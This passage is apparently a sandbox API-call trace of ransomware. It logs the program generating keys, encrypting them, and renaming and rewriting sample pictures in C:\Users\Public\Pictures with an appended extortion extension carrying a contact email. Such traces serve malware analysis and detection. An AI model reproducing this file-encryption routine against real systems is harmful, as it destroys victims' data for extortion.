returned 1 [0169.524] WriteFile (in: hFile=0x5d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0169.526] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0169.526] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0169.526] ReadFile (in: hFile=0x5d8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x8907c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x8907c, lpOverlapped=0x0) returned 1 [0169.554] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0169.554] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0169.554] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", dwFileAttributes=0x80) returned 1 [0169.556] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 51 [0169.556] GetProcessHeap () returned 0x2e0000 [0169.556] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xcc) returned 0x3470a0 [0169.556] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" [0169.556] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0169.556] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0169.559] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d8 [0169.559] GetProcessHeap () returned 0x2e0000 [0169.559] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0169.559] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=780831) returned 1 [0169.559] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xbea1f [0169.559] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0169.559] GetProcessHeap () returned 0x2e0000 [0169.559] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0169.559] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0169.559] WriteFile (in: hFile=0x5d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0169.561] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0169.561] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0169.561] ReadFile (in: hFile=0x5d8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xbea1f, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xbea1f, lpOverlapped=0x0) returned 1 [0169.610] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0169.610] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0169.610] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", dwFileAttributes=0x80) returned 1 [0169.610] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 55 [0169.610] GetProcessHeap () returned 0x2e0000 [0169.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x319788 [0169.610] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" [0169.610] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0169.610] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0169.612] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d8 [0169.613] GetProcessHeap () returned 0x2e0000 [0169.613] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0169.613] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=775702) returned 1 [0169.613] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xbd616 [0169.613] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0169.613] GetProcessHeap () returned 0x2e0000 [0169.613] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0169.613] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0169.613] WriteFile (in: hFile=0x5d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0169.615] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0169.615] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0169.615] ReadFile (in: hFile=0x5d8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xbd616, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xbd616, lpOverlapped=0x0) returned 1 [0169.655] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0169.655] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0169.655] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", dwFileAttributes=0x80) returned 1 [0169.656] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 56 [0169.656] GetProcessHeap () returned 0x2e0000 [0169.656] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd6) returned 0x319788 [0169.656] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" [0169.656] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0169.656] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0169.658] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d8 [0169.659] GetProcessHeap () returned 0x2e0000 [0169.659] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0169.659] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=595284) returned 1 [0169.659] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x91554 [0169.659] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0169.659] GetProcessHeap () returned 0x2e0000 [0169.659] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0169.659] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0169.659] WriteFile (in: hFile=0x5d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0169.661] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0169.661] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0169.661] ReadFile (in: hFile=0x5d8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x91554, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x91554, lpOverlapped=0x0) returned 1 [0169.699] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0169.699] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0169.699] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", dwFileAttributes=0x80) returned 1 [0169.700] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 53 [0169.700] GetProcessHeap () returned 0x2e0000 [0169.700] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd0) returned 0x3470a0 [0169.700] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" [0169.700] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0169.700] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0169.703] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d8 [0169.703] GetProcessHeap () returned 0x2e0000 [0169.703] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0169.703] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1120) returned 1 [0169.703] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x460 [0169.703] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0169.703] GetProcessHeap () returned 0x2e0000 [0169.703] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0169.703] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0169.703] WriteFile (in: hFile=0x5d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0169.705] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0169.705] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0169.705] ReadFile (in: hFile=0x5d8, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x460, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x460, lpOverlapped=0x0) returned 1 [0169.705] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=-1120, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.705] WriteFile (in: hFile=0x5d8, lpBuffer=0x31d0648*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0648*, lpNumberOfBytesWritten=0x2acf9c8*=0x460, lpOverlapped=0x0) returned 1 [0169.705] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0169.705] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0169.705] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", dwFileAttributes=0x80) returned 1 [0169.706] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 52 [0169.706] GetProcessHeap () returned 0x2e0000 [0169.706] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xce) returned 0x3470a0 [0169.706] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" [0169.706] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0169.706] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0169.708] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d8 [0169.708] GetProcessHeap () returned 0x2e0000 [0169.708] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0169.708] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=845941) returned 1 [0169.708] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xce875 [0169.708] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0169.708] GetProcessHeap () returned 0x2e0000 [0169.709] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0169.709] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0169.709] WriteFile (in: hFile=0x5d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0169.710] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0169.710] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0169.711] ReadFile (in: hFile=0x5d8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xce875, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xce875, lpOverlapped=0x0) returned 1 [0169.761] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0169.761] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0169.761] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", dwFileAttributes=0x80) returned 1 [0169.762] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 59 [0169.762] GetProcessHeap () returned 0x2e0000 [0169.762] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xdc) returned 0x3a7428 [0169.762] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" [0169.762] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0169.762] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0169.764] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d8 [0169.764] GetProcessHeap () returned 0x2e0000 [0169.764] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0169.764] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=879394) returned 1 [0169.764] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd6b22 [0169.764] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0169.764] GetProcessHeap () returned 0x2e0000 [0169.765] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0169.765] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, 